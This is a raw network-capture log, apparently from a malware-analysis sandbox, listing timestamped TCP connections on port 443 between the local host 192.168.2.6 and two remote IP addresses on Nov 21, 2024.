                                                                                                                                                                        Nov 21, 2024 10:38:44.099513054 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.105855942 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.105875015 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.245172977 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.245656967 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.245677948 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.246118069 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.246125937 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.688342094 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.691905022 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.691962004 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.692015886 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.692035913 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.692048073 CET50017443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.692055941 CET4435001713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.694916010 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.694962978 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.695036888 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.695171118 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:44.695184946 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.930638075 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:44.930762053 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:44.930879116 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:44.931467056 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:44.931499958 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.035281897 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.035896063 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.035917997 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.036395073 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.036398888 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.478255033 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.481754065 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.481812000 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.481831074 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.481848001 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.481897116 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.481939077 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.481952906 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.481965065 CET50018443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.481970072 CET4435001813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.484973907 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.485013008 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.485069990 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.485230923 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.485249996 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.558625937 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.559154987 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.559174061 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.559621096 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.559627056 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.884315968 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.885900021 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.885932922 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.886356115 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.886362076 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.919914007 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.920470953 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.920533895 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:45.920960903 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:45.920979977 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.038845062 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.042062998 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.045502901 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.045536995 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.045552969 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.045568943 CET50019443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.045573950 CET4435001913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.049442053 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.049487114 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.053527117 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.053710938 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.053725958 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.327477932 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.330554008 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.333641052 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.362816095 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.362816095 CET50021443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.362878084 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.362911940 CET4435002113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.365710020 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.365744114 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.365844011 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.365964890 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.365972042 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.371365070 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.374743938 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.374814034 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.374818087 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.374882936 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.375040054 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.375040054 CET50020443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.375083923 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.375111103 CET4435002013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.377284050 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.377322912 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.377500057 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.377604961 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.377619982 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.473510027 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.477926970 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.477987051 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.488811016 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.488828897 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.696563005 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.696655989 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:46.698295116 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:46.698316097 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.699109077 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.700783014 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:46.700828075 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:46.700849056 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.700953007 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:46.747334957 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.918334007 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.921540976 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.921593904 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.921699047 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.921771049 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.921818018 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.921818018 CET50022443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.921863079 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.921945095 CET4435002213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.924711943 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.924793959 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:46.924905062 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.925059080 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:46.925088882 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.210849047 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.210932970 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.210992098 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:47.213296890 CET50023443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:47.213310957 CET4435002340.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.264204025 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.264730930 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.264758110 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.265391111 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.265398026 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.713243961 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.716458082 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.716573954 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.716753006 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.716773033 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.716785908 CET50024443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.716793060 CET4435002413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.719640017 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.719674110 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.719742060 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.719886065 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.719896078 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.835625887 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.836097956 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.836138010 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:47.836524963 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:47.836539030 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.146162033 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.147903919 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.147927999 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.148353100 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.148363113 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.174015045 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.176064014 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.176103115 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.176496983 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.176513910 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.279545069 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.282547951 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.282665014 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.282875061 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.282896996 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.282910109 CET50025443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.282916069 CET4435002513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.285546064 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.285588980 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.285677910 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.285809994 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.285823107 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.593318939 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.596394062 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.596435070 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.596522093 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.596726894 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.596750975 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.596765995 CET50026443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.596774101 CET4435002613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.599411964 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.599441051 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.599616051 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.599785089 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.599792004 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.617213964 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.620512962 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.620579004 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.620616913 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.620632887 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.620654106 CET50027443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.620660067 CET4435002713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.622948885 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.622968912 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.623037100 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.623153925 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.623167992 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.705943108 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.706728935 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.706784964 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:48.707210064 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:48.707222939 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.153686047 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.156678915 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.156752110 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.166785955 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.166841030 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.166872978 CET50028443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.166892052 CET4435002813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.188071966 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.188118935 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.188183069 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.189708948 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.189726114 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.500869989 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.501363993 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.501384020 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.501813889 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.501820087 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.945502996 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.945580006 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.945636988 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.945691109 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.945733070 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.951756001 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.951776981 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.951795101 CET50029443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.951801062 CET4435002913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.954874039 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.954921961 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:49.955008984 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.955135107 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:49.955146074 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.002588034 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.003240108 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.003339052 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.003726006 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.003741980 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.409065008 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.409699917 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.409729004 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.410332918 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.410337925 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.436304092 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.439893961 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.439948082 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.439991951 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.440015078 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.440032959 CET50030443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.440040112 CET4435003013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.442667007 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.442703009 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.442763090 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.442888975 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.442898989 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.447359085 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.447701931 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.447719097 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.448123932 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.448128939 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.856312990 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.859293938 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.859422922 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.859668970 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.859687090 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.859699011 CET50032443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.859704971 CET4435003213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.862842083 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.862879038 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.862987041 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.863250017 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.863264084 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.907396078 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.910398006 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.910453081 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.910471916 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.910525084 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.910598993 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.910610914 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.910628080 CET50031443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.910633087 CET4435003113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.913584948 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.913650990 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.913722992 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.913923979 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.913942099 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.969929934 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.970447063 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.970479965 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:50.970900059 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:50.970906973 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.413463116 CET4435003313.107.246.60192.168.2.6
